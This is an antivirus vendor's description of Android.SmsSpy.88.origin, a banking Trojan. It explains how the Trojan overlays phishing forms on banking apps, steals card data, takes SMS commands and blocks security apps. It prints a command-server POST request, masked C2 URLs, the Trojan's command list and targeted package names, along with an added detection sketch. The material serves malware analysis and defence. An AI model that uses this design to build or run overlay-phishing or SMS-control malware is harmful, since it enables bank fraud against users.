Android.SmsSpy.88.origin

Added to the Dr.Web virus database: 2015-08-26

Virus description added:

SHA1:

b607191448d0c31ea7d4a4ce9a0268cc72a23701
c80ce28bae65d06c6855b0e2647f752a3b7c4fbe
18747eaf81daaf51abe76749dc6fa89937e2a6f5

A Trojan for Android designed to steal user login credentials needed to access online banking programs and to steal money from victims’ bank accounts. Android.SmsSpy.88.origin is distributed under the guise of benign applications—for example, Adobe Flash Player.


When launched, the Trojan prompts the user to grant it administrator privileges:

[Screenshot: administrator privileges prompt]

It then turns on the Wi-Fi module and checks every second whether a Wi-Fi or cellular connection has been established. If no connection is made, Android.SmsSpy.88.origin enables these communication channels once again.

Then the Trojan sends the following information to the command and control server:

  • Infected device's unique identifier generated by the Trojan
  • IMEI identifier
  • Current system language
  • Mobile network operator
  • OS version
  • Mobile device model
  • Cell phone number

Stealing authentication information

The configuration file of Android.SmsSpy.88.origin contains a list of online banking applications and links to phishing dialog templates for these applications. For example:

  • "com.paypal.android.p2pmobile" – "http://******merti.com/333/l/pl/paypal.php"
  • "de.commerzbanking.mobil" – "http://******merti.com/333/l/de/06.php"
  • "com.ing.diba.mbbr2" – "http://******merti.com/333/l/de/13.php"
  • "de.ing_diba.kontostand" – "http://******merti.com/333/l/de/13.php"
  • "de.fiducia.smartphone.android.banking.vr" – "http://******merti.com/333/l/de/15.php"

Android.SmsSpy.88.origin keeps track of when any of the above-listed applications are launched. If a launch is detected, the Trojan downloads a phishing input form from the server and displays it on top of the running application. All information entered by the user is then sent to cybercriminals. Phishing dialogs may look as follows:

[Screenshots: examples of phishing dialogs]

Stealing credit card information

Android.SmsSpy.88.origin also attempts to steal user bank card information by tracking the launch of the following applications specified in its configuration (this list can contain different application names depending on the Trojan’s modification):

  • com.android.vending;
  • com.viber.voip;
  • com.whatsapp;
  • com.skype.raider;
  • com.facebook.orca;
  • com.facebook.katana;
  • com.instagram.android;
  • com.android.chrome;
  • com.twitter.android;
  • com.google.android.gm;
  • com.android.calendar;
  • jp.naver.line.android.

Once the Trojan detects that one of the above-mentioned applications is running, it displays a bogus dialog resembling the one used to make purchases on Google Play, prompting the user to enter their bank card information:

[Screenshots: bogus Google Play payment dialogs]

All the entered information is then transmitted to the server.

Command execution

Android.SmsSpy.88.origin can receive the following commands from the server:

  • rent&&&—start intercepting all incoming SMS messages;
  • sms_stop&&&—stop intercepting incoming SMS messages;
  • sent&&&—send a text message;
  • ussd&&&—send a USSD request;
  • delivery&&&—send SMS messages to all contact list numbers;
  • apiserver—change the address of the command and control server;
  • appmass—send an MMS message;
  • windowStop—add a specified application to the exclusion list so that when that application is launched, a phishing dialog is not displayed;
  • windowStart—delete a specified application from the exclusion list;
  • windowsnew—download an updated executable file containing a list of attacked applications from the server;
  • UpdateInfo—send information about all installed applications to the server;
  • freedialog—display a template-based dialog using WebView (this command is applied to activate the screen lock function);
  • freedialogdisable—cancel the display of the WebView dialog;
  • adminPhone—change the phone number used to send SMS messages that repeat commands;
  • killStart—set the password for ScreenLock;
  • killStop—clear the password from ScreenLock;
  • upload_sms—send all saved SMS messages to the server;
  • notification—display a notification with the received parameters.

The Trojan can also receive the rent&&&, sent&&&, ussd&&&, killStart, and killStop commands as text messages from cybercriminals.

If a command is executed successfully, the malicious program reports this to the server by sending a POST request:

POST http://******merti.com/333/set_result.php HTTP/1.1
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Host: ******merti.com
Connection: Keep-Alive

bot_id=**********260a5fc56212793aca5387&result=windowStart+OK
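The result report above has a stable shape that a proxy or network sensor can match. The following detection sketch is an added example, not part of the original Dr.Web description; the function names and sample hosts are hypothetical, and it assumes the bot identifier is 32 hexadecimal characters (inferred from the masked sample) and that commands are reported without the "&&&" separator.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Command names from the list on this page, with the "&&&" separator dropped
# (assumption: the report carries the bare name, as in "windowStart+OK").
COMMANDS = {
    "rent", "sms_stop", "sent", "ussd", "delivery", "apiserver", "appmass",
    "windowStop", "windowStart", "windowsnew", "UpdateInfo", "freedialog",
    "freedialogdisable", "adminPhone", "killStart", "killStop", "upload_sms",
    "notification",
}
BOT_ID_RE = re.compile(r"^[0-9a-f]{32}$")  # assumption: 32 hex characters

def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()

def match_result_report(raw):
    """Return details if the request matches the result-report shape, else None."""
    try:
        method, target, headers, body = parse_request(raw)
    except ValueError:
        return None
    if method != "POST" or not urlsplit(target).path.endswith("/set_result.php"):
        return None
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    fields = parse_qs(body, keep_blank_values=True)  # decodes "+" to a space
    bot_id = fields.get("bot_id", [""])[0]
    result = fields.get("result", [""])[0]
    if not BOT_ID_RE.match(bot_id) or not result.endswith(" OK"):
        return None
    command = result[:-3]
    return {"host": headers.get("host", ""), "bot_id": bot_id,
            "command": command, "known_command": command in COMMANDS}

# Constructed sample requests (hosts and identifier are made up for the example).
SAMPLE_HIT = ("POST http://c2.example.invalid/333/set_result.php HTTP/1.1\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n"
              "Host: c2.example.invalid\r\n\r\n"
              "bot_id=0123456789abcdef0123456789abcdef&result=windowStart+OK")
SAMPLE_MISS = ("POST /api/set_result.php HTTP/1.1\r\nContent-Type: application/json\r\n"
               "Host: shop.example.invalid\r\n\r\n" '{"result": "OK"}')
```

A match with `known_command` set to false is still worth reviewing, since the command list varies between modifications of the Trojan.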

Resistance to anti-virus software

Android.SmsSpy.88.origin tries to hinder the work of some anti-virus programs and service utilities, preventing them from launching. Depending on the Trojan modification involved, these programs can include:

  • com.cleanmaster.security;
  • com.cleanmaster.mguard;
  • com.piriform.ccleaner;
  • com.cleanmaster.mguard_x86;
  • com.cleanmaster.sdk;
  • com.cleanmaster.boost;
  • com.drweb;
  • com.qihoo.security;
  • com.kms.free;
  • com.eset.ems2.gp;
  • com.qihoo.security.lite;
  • com.symantec.mobilesecurity;
  • com.dianxinos.optimizer.duplay.

Names of banking applications attacked

The following online banking applications are currently known to be attacked by the Trojan:

  • at.bawag.mbanking
  • at.easybank.mbanking
  • at.spardat.netbanking
  • at.volksbank.volksbankmobile
  • au.com.bankwest.mobile
  • au.com.ingdirect.android
  • au.com.nab.mobile
  • Citibank.CZ
  • com.akbank.android.apps.akbank_direkt
  • com.arkea.android.application.cmb
  • com.arkea.android.application.cmso2
  • com.bankaustria.android.olb
  • com.bbva.bbvacontigo
  • com.bbva.bbvawallet
  • com.bbva.nxt_tablet
  • com.boursorama.android.clients
  • com.cacf.MonCACF
  • com.caisseepargne.android.mobilebanking
  • com.cajamar.Cajamar
  • com.chase.sig.android
  • com.cic_prod.bad
  • com.citi.citimobile
  • com.citiuat
  • com.cm_prod.bad
  • com.comarch.mobile
  • com.commbank.netbank
  • com.CreditAgricole
  • com.db.mm.deutschebank
  • com.discoverfinancial.mobile
  • com.finansbank.mobile.cepsube
  • com.fullsix.android.labanquepostale.accountaccess
  • com.garanti.cepsubesi
  • com.getingroup.mobilebanking
  • com.groupama.toujoursla
  • com.grppl.android.shell.CMBlloydsTSB73
  • com.grppl.android.shell.halifax
  • com.idamob.tinkoff.android
  • com.infonow.bofa
  • com.ing.diba.mbbr2
  • com.IngDirectAndroid
  • com.isis_papyrus.raiffeisen_pay_eyewdg
  • com.konylabs.CBHU
  • com.konylabs.cbplpat
  • com.lbp.peps
  • com.macif.mobile.application.android
  • com.ocito.cdn.activity.creditdunord
  • com.paypal.android.p2pmobile
  • com.pozitron.iscep
  • com.regions.mobbanking
  • com.starfinanz.mobile.android.dkbpushtan
  • com.starfinanz.smob.android.sbanking
  • com.starfinanz.smob.android.sfinanzstatus
  • com.tmobtech.halkbank
  • com.usaa.mobile.android.usaa
  • com.vakifbank.mobile
  • com.ykb.android
  • com.ziraat.ziraatmobil
  • de.adesso.mobile.android.ga
  • de.adesso.mobile.android.gad
  • de.comdirect.android
  • de.commerzbanking.mobil
  • de.consorsbank
  • de.dkb.portalapp
  • de.fiducia.smartphone.android.banking.vr
  • de.ing_diba.kontostand
  • de.postbank.finanzassistent
  • es.bancopopular.android.lanzadera
  • es.bancosantander.apps
  • es.lacaixa.mobile.android.newwapicon
  • eu.eleader.mobilebanking.pekao
  • eu.eleader.mobilebanking.raiffeisen
  • fr.axa.monaxa
  • fr.banquepopulaire.cyberplus
  • fr.banquepopulaire.cyberplus.pro
  • fr.creditagricole.androidapp
  • fr.lcl.android.customerarea
  • fr.lemonway.groupama
  • mobi.societegenerale.mobile.lappli
  • mobile.santander.de
  • net.bnpparibas.mescomptes
  • net.inverline.bancosabadell.officelocator.android
  • org.banksa.bank
  • org.stgeorge.bank
  • org.westpac.bank
  • pl.bzwbk.bzwbk24
  • pl.bzwbk.mobile.tab.bzwbk24
  • pl.eurobank
  • pl.ing.ingmobile
  • pl.mbank
  • pl.pkobp.iko
  • ru.alfabank.mobile.android
  • ru.mw
  • ru.sberbankmobile
  • ru.vtb24.mobilebanking.android
  • uk.co.tsb.mobilebank
  • wit.android.bcpBankingApp.millenniumPL


Treatment recommendations


Android

  1. If your mobile device is operating normally, download and install the free anti-virus product Dr.Web for Android Light on it. Run a full scan and follow the recommendations for neutralizing the detected threats.
  2. If the mobile device is locked by a Trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is displayed on the device's screen), proceed as follows:
    • start your smartphone or tablet in safe mode (if you do not know how, consult the device's documentation or contact the manufacturer);
    • then download and install the free anti-virus product Dr.Web for Android Light on the infected device, run a full scan and follow the recommendations for neutralizing the detected threats;
    • switch your device off and then back on.
